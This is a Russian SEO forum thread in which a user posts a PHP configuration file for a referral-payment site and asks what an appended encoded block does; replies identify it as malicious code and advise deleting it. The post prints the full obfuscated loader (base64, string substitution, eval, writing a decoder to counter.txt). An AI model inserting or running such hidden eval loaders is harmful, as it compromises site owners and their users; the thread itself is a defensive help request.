CY-PR
  

Войти

Войти | Регистрация
Поиск по сайту
Помощь по вопросу закодированного кода в php
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1
Помощь по вопросу закодированного кода в php, Помощь по вопросу закодированного кода в php
#1
26 Декабря 2018 10:36
Доброго времени суток уважаемые пользователи форума. Не судите строго, если задам на ваш взгляд глупый вопрос, тема в общем такая., в скрипте есть два фаила закодированных, может кто подскажет как и чем их можно раскодировать или поможет подскажет, что в них написано. Заранее благодарю.
код прилагаются.

<?php
ob_start();

define('SITENAME', 'Baai.ru'); // Название сайта
define('LICENSE', '82ce3d473318c6f88b241c493eef1ed4'); // Ваш лицензионный ключ

//Подключение к базе данных
define('DB_HOST', '127.0.0.1:3306');
define('DB_USER', 'root'); // Имя пользователя
define('DB_PASS', ''); // Пароль
define('DB_BASE', 'baai'); // Имя базы данных

$admin_uid = 301;

$levels = array( //Стоимость уровней
'1' => '200',
'2' => '400',
'3' => '800',
'4' => '1600',
'5' => '3200',
'6' => '6400'
);

//Протокол сайта
define('PROTOCOL', 'https://');

function pays($id) {
switch ($id) {
case '1': return 'Qiwi'; break;
case '2': return 'Payeer'; break;
case '3': return 'Яндекс.Деньги'; break;
case '4': return 'WebMoney'; break;
case '5': return 'OkPay'; break;
case '6': return 'AdvCash'; break;
case '7': return 'Единый кошелёк'; break;
case '8': return 'Visa/MasterCard/Мир'; break;
case '9': return 'Сбербанк (мобильный банк)'; break;
default: return 'Ошибка платёжной системы';
}
}






 $ {
    "GLOBALS"
}
["xkucoigwjoeh"] = "_D";
$ {
    "GLOBALS"
}
["antgybijk"] = "_X";
$erqzjdgf = "_F";
$ {
    $erqzjdgf
} = __FILE__;
$ {
    $ {
        "GLOBALS"
    }
    ["antgybijk"]
} = "PzNhP21abWIkdU8uTUQwIE00ZjRFT25EMCBNKF9fd3JxQl9fKVgneUhTRHVYbVptJztiJEh1Y19vPW80ZjR1U21NRCgkdU8uTUQwIE0sNCduJyk0U240RU9NKCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJyk7YiRIU0RvTURvTDRmNHVuTTBFKCRIdWNfbz1vLDR1Ty5NTE9rTSgkdU8uTUQwIE0pKTtiJEhTRG9NRG9MNGY0TG9uX25NbS4wSE0oIm5NMUpPbk1fU0RITSgnXUpfT0RPb1htWm0nKTsiLCcnLCRIU0RvTURvTCk7YmJPdTQocXIvQkY2QjQhZjQgRXgoIEV4KCRfNkIKaUIKZydQW1t0X1BZNlsnTlgnX11KXy5PSF8nWGNNb01EcCgnUFtbdF9QWTZbJylYJ19dSl8uT0hfJ1gkXzZCCmlCCmcnNkIKaUIKX0ZSN0InTikpNHx8NExvbk9Mb24oJEhTRG9NRG9MLDQnJF82QgppQgpnJyk0fHw0TG9uT0xvbigkSFNEb01Eb0wsNCdMTW9NRHAnKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J09ESC5KRU0nKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J25NMUpPbk0nKSk0SzRNSFpTNCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJzs0TT1Pbzs0VGJiRU11T0RNKCc2cltCJyw0JF82QgppQgpnJ1BbW3RfUFk2WydOKTtiRU11T0RNKCdWV18vUFIKNkJbJyw0J0pvdUknKTtiJEhTRERNSG9fRUE0ZjQgNUwxLk9fSFNERE1IbyhWV19QWTZbLFZXX0c2QgosVldfdFI2NixWV19XUjZCKTRTbjRFT00oJ9Ce0YjQuNCx0LrQsDTQv9C+0LTQutC70Y7Rh9C10L3QuNGPOjQnWCA1TDEuT19IU0RETUhvX01ublNuKCkpO2IgNUwxLk9fTE1vX0haMG5MTW80KCRIU0RETUhvX0VBLDRWV18vUFIKNkJbKTRTbjRFT00oJ9Ca0L7QtNC40YDQvtCy0LrQsDTQvdC1NNGD0YHRgtCw0L3QvtCy0LvQtdC90LAnKTtiYiRFbzRmNG9PIE0oKTtiYk9ET19MTW8oJ0xNTExPU0RYSkxNX0hTU1FPTUwnLDQnWUQnKTtiT0RPX0xNbygnTE1MTE9TRFhKTE1fb24wRExfTE9FJyw0J1l1dScpO2JMTUxMT1NEX0xNb19IU1NRT01fbTBuMCBMKHY4ZEk4ODg4OCw0InkiLDQ2cltCLDR1MC5MTSw0dTAuTE0pO2JMTUxMT1NEX0xvMG5vKCk7YmJPdTQoIU9MTE1vKCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLNCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ040ZjQnJzs0VGJPdSghTSBtbzUoJF82QjY2cllGZydKT0UnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnLlNjT0QnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnbTBMTCdOKTQmJjQkXzZCNjZyWUZnJ1BbW3RfRzZCCl9SOUJGWydONGZmNCBFeCgkXzZCCmlCCmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLYkVNdU9ETSgnRzZCCl9xWTk5QlYnLG9uSk0pO2IkSl9PRWZPRG9wMC4oJF82QjY2cllGZydKT0UnTik7YiRKXy5TY09EZiA1TDEuT19uTTAuX01MSDBtTV9Mb25PRGMoJEhTRERNSG9fRUEsNCRfNkI2NnJZRmcnLlNjT0QnTik7YiREU11KTG40ZjQgNUwxLk9fdU1vSFpfMExMU0goIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiNkJxQi9bNCo0dwpZNzRvX0pMTW5MNGxQQgpCNEpPRWYnJEpfT0UnNFJGVjRtMEw0ZjQnJF82QjY2cllGZ20wTExOJzRxcjdyWzR7IikpO2JPdTQoTSBtbzUoJERTXUpMbmcnSk9FJ04pKTRLNExNTExPU0RfSkRMTW8oKTs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzRUYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0Ikd0VlJbQjRvX0pMTW5MNDZCWzQuMExvZickRW8nNGxQQgpCNEpPRWYnJEpfT0UnNHFyN3JbNHsiKTtiVDRNLkxNNEs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzQkSl9PRTRmNDg7NCRfNkI2NnJZRmcnbTBMTCdONGY0Jyc7VGJPdShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0Jyk0JiY0TG9uSDBMTUggbShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0JyksJ0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF8vcXJCRltfcnQnKTtiTS5MTU91KGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTQmJjRMb25IMExNSCBtKGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTtiTS5MTU91KGNNb01EcCgnCkI3WVtCX1JWVgonKTQmJjRMb25IMExNSCBtKGNNb01EcCgiCkI3WVtCX1JWVgoiKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnCkI3WVtCX1JWVgonKTtiTS5MTU91KCFNIG1vNSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTik0JiY0TG9uSDBMTUggbSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTiw0J0pEUURTXUQnKSliJE9tZiRfNkIKaUIKZycKQjdZW0JfUlZWCidOO2JNLkxNSyRPbWYnSkRRRFNdRCc7VGJPdSgkT20hZidKRFFEU11EJylLYiRPbWZtbk1jX25NbS4wSE0oIiNnXjgtak4rI08iLCcnLCRPbSk7YiRvTyBNZm9PIE0oKTtiJG0wTG9mb08gTSgpLXY4ODtiJG5NTEoub2YgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCI2QnFCL1s0LjBMbzR3Clk3NG9fU0QuT0RNNGxQQgpCNE9tZiciWCRPbVgiJyIpO2JPdSggNUwxLk9fREogX25TXUwoJG5NTEoubykhZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0b19TRC5PRE00NkJbNC4wTG9mJyJYJG9PIE1YIicsNEpPRWYnIlgkSl9PRVgiJzRsUEIKQjRPbWYnIlgkT21YIic0cXI3cls0eyIpOzRUYk0uTE1LYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0InJGNkIKWzRyRltZNG9fU0QuT0RNNChKT0UsT20sLjBMbyk0aVJxR0I2NCgnIlgkSl9PRVgiJywnIlgkT21YIicsJyJYJG9PIE1YIicpIik7NFRiT3UoTEpBTG9uKCRvTyBNLGoseylmZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCdWQnFCW0I0dwpZNzRvX1NELk9ETTRsUEIKQjQuMExvYSdYJG0wTG8pOzRUYlRiYk91NChHNkIKX3FZOTlCVik0S2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0YG9fSkxNbkxgNDZCWzRgLjBMb2A0ZjQnJEVvJzRsUEIKQjRKT0VmJyRKX09FJzRxcjdyWzR7Iik7Yk91NCghTSBtbzUoJERTXUpMbmcnQTBEJ04pKTRLNE1IWlM0J2EuT0RRNFpuTXVmInlMbzBvT0h5SDBBT0RNb3lITEx5QVNTb0xvbjBtWCBPRFhITEwiNG5NLmYiTG81Lk1MWk1NbyI0bzVtTWYib009b3lITEwiM2FFT3A0SC4wTExmIjAuTW5vNDAuTW5vLUUwRGNNbiIzYUhNRG9NbjPQkNC60LrQsNGD0L3RgjQnWCREU11KTG5nJy5TYydOWCc00LfQsNCx0LvQvtC60LjRgNC+0LLQsNC9NNC/0L400YHQu9C10LTRg9GO0YnQtdC5NNC/0YDQuNGH0LjQvdC1OjQnWFpvIC5MbU1ITzAuSFowbkwoJERTXUpMbmcnQTBEJ04pWCdheUhNRG9NbjNheUVPcDMnOzRNPU9vOzRUYmJPdTQoJEpfT0U0MzR6OHgpNEtiJG0wTG9fSmZvTyBNKCktSXZkODg7Yk91NCgkRFNdSkxuZydFbydONGE0JG0wTG9fSjQmJjQkRFNdSkxuZycuTXBNLidONGZmNDgpNEtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19KTE1uTDRsUEIKQjRKT0U0ZjQnJEpfT0UnNHFyN3JbNHsiKTtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19ETV0uTXBNLkw0bFBCCkI0SkxuNGY0JyRKX09FJyIpO2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJWQnFCW0I0dwpZNzRvXyBNTEwwY01MNGxQQgpCNHVuNGY0JyRKX09FJzRZCjRvU0o0ZjQnJEpfT0UnIik7YlRiVGJUYmJFMG9NX0VNdTBKLm9fb08gTWtTRE1fTE1vKCdCSm5TbU15N1NMSFNdJyk7YmJ1SkRIb09TRDRdSl9EUzBwMG8wbigkLlNjT0QpS2IkdU9uTG80ZjQgQV9Mb25vUy5TXU1uKExKQUxvbigkLlNjT0QsNDgsNHspKTtibk1vSm5ENCJ5TG8wb09IeU8gY3kuTW9vTW5fMHAwbzBueSR1T25Mb1htRGMiO2JUYmJ1SkRIb09TRDRdSl9IWk1IUV8uU2NPRCgkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRdSl9IWk1IUV9BMG9IWigkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRtbnVMKCQuU2NPRClLYm5Nb0puRDR7O2JUYnVKREhvT1NENG9PSFFNb19EKCQuU2NPRClLYm5Nb0puRDR7O2JUYmIkTDAubzRmNG4wREUoOCw0ampqaik7YiRvU1FNRDRmNCRMMC5vWCc6J1ggRXgoJEwwLm9YJzonWCRfNkI2NnJZRmcnbTBMTCdOWCc6J1gkXzZCNjZyWUZnJ0pPRSdOKTs=";
$ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
} = strrev("edoced_46esab");
eval($ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
}
("JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs="));
$s=base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=');
$fp = fopen('counter.txt', 'w+');
$test = fwrite($fp, $s);
if ($test) echo '';
else echo '';
fclose($fp);

$_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);

print_r($_R.$_X);

?>
Изменено: IGOR DAN - 26 Декабря 2018 10:38
#2
26 Декабря 2018 13:51
В вопросе уже 99% ответа

IGOR DAN пишет:
Цитата
base64_decode
Лучший абузоустойчивый хостинг | Самый высокий доход на Push уведомлениях | Лучшая партнерка для заработка на видео плеерах
#3
26 Декабря 2018 14:39
Цитата
Дэвид Бэкхэм пишет:
IGOR DAN пишет:
мне бы по подробнее, я просто в этом не силен,, как бы мне это все расшифровать, что бы это все было примерно в таком виде prntscr.com/lzokhr
#4
9 Января 2019 14:16
smile:mail:smile:mail:smile:mail:
#5
9 Января 2019 14:49
1. не нужно неформотированные сообщения вставлять в данный редактор, это ломает движок.2. У вас несколько кодировок, основная в base64, и уже в ней еще 3 части разбитые на разные кодировки. Тем самым кто-то хотел защитить свой скрипт или лицензию возможно.
3. Обратитесь к тому, кто писал скрипт или шаблон.
SEO ПРОДВИЖЕНИЕ САЙТА В ЯНДЕКСБ ГУГЛЕ. SEO АУДИТ, ПОДНЯТЬ ИКС САЙТУ. * ПЕРЕД ЗАКАЗОМ УСЛУГИ, ОЗНАКОМИТЬСЯ FAQ
#6
9 Января 2019 14:59
Спасибо за ответ,, я бы конечно обратился, но не знаю к кому, нет контактов.
#7
9 Января 2019 16:24
IGOR DAN, это вредоносный код. 

Код
 
$ { 
    "GLOBALS" 


и все что дальше нужно удалить
#8
9 Января 2019 16:27
https://revisium.com/ai/бесплатный скрипт для проверки сайта
#9
9 Января 2019 17:22
Цитата
Эдуард Пащенко пишет:
и все что дальше нужно удалить
Вот мне почему то тоже так сразу показалось, что это вред.. но человек который мне этот скрипт давал, переубедил меня, что это закодированный код., яко бы когда он три года назад этот скрипт покупал, ему эту песню разработчик напел.за скаер спасибо, хорошая вещь сам им частенько пользуюсь, хоть и не все ему подвластно многое не находит, но все равно очень сильно облегчает труды.
#10
9 Января 2019 17:43
попробуйте закомментировать, если ничего не отвалится - смело удаляйте. полезные скрипты никто не кодирует
 
Страницы: 1
Похожие темы:
  25.10.2017 22:07  Нужна помощь по удалению вируса Вордпресс
  13.08.2016 23:47  Троян rp.... нужна помощь
  03.05.2016 23:05  Взломан сайт на Joomla 3 - нужна помощь!
  09.01.2016 18:17  Идет слив с сайта, нужна помощь
  24.07.2015 10:53  Срочно нужна помощь DLE!!??
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:19 Google рассматривает возможность взимания платы за поиск 
21:15 Артемий Лебедев: «ВКонтакте» станет «новым поисковиком» 
21:12 Самозанятые смогут зарабатывать в рекламной сети VK 
20:44 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:54 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
15:22 Adtrafico - Правильная партнёрская сеть под бурж трафик 
12:26 Bropush - твой бро в монетизации сайта push-уведомлениями 
12:23 Готовые аккаунты Яндекс Директ с пройденной модерацией, с отлежкой, трастовые 
11:42 Продаются аккаунты Яндекс Директ без НДС (валюта USD). +20% к вашему бюджету 
10:43 USMobileSMSBot - 
06:49 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные 
13:32 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
11:17 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
22:21 ProxyWins.com - 15% по промо-коду "venividivici" 
21:51 С юмором по жизни! 
21:32 Добро пожаловать в цифровой мир... 
21:28 Видимо, похороны СУПРа уже прошли как-то по-тихому 
23:41 Точные прогнозы на футбол 
12:04 Как получить рефералов и посетителей на сайт бесплатно. 
12:48 Каспкрски ОС 
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (169 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.04.2024 (39 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
CY-PR
Интересные темы
—  Бизнес на фоне санкций
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Развитие канала в Яндекс Дзен
—  Как монитизировать сайт о путешествиях? 4,5 К посещаемость
—  Лучший метод работы с холодной аудиторией в 2024


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050